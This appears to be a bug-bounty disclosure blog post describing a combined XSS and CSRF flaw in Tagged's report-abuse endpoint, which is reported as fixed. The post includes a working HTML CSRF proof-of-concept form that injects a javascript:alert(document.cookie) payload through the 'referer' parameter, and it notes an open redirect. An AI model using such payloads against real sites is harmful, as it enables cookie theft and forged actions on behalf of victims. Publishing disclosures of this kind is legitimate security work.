XSS+CSRF attack in Tagged using Redirect parameter(Open URL Redirection attack Possible)

Hi guys,

Today i want to show you how you can combine XSS and CSRF attack.This is very interesting but pretty difficult to find and create a POC.

Bug type : XSS+CSRF
Bug category : XSS,CSRF
OWASP link :
1.https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
2.https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)

Description : In tagged you can report spam/abuse on any user.In HTTP POST request you will find a hidden parameter called "Referer" .This URL is used to redirect to you the URL you provide.You can also attack victim to Redirection attack to any website.
Now in Javascript when you give referrer as any URL,It will redirect you to given URL by you.But when you put javascript:alert(1) as a URL it will execute the code which you provide.
Attack Steps :
1. Create a CSRF POC where you will give XSS payload javascript:alert(1)
2.Click on the Button and you will get XSS pop up
3.You can also redirect victim to any malicious URL by putting URL in referrer.

XSS parameter used : javascript:alert(document.cookie) in referrer

Proxy Tool used : BurpSuite

HTML Code for CSRF:

<html>
<body>
<form  action="http://m.tagged.com/report_abuse.html "method="POST">
<input type ="hidden" name="report_userId" value="6025854846">
<input type="hidden" name="referer" value="javascript:alert(document.cookie)">
<input type="hidden" name ="contentId" value="1436985861035340" >
  <input type="hidden" name ="reason" value="threads" >
  <input type="submit">
</form>
</body>
</html>


Video POC :


Status : Fixed


Comments

Popular posts from this blog

Airbnb : Steal Earning of Airbnb hosts by Adding Bank Account/Payment Method (IDOR)

Add Credit Card to Any Uber account Through eats.uber.com(CSRF)

Account Takeover of All Souq.com users by Adding new Email(CSRF)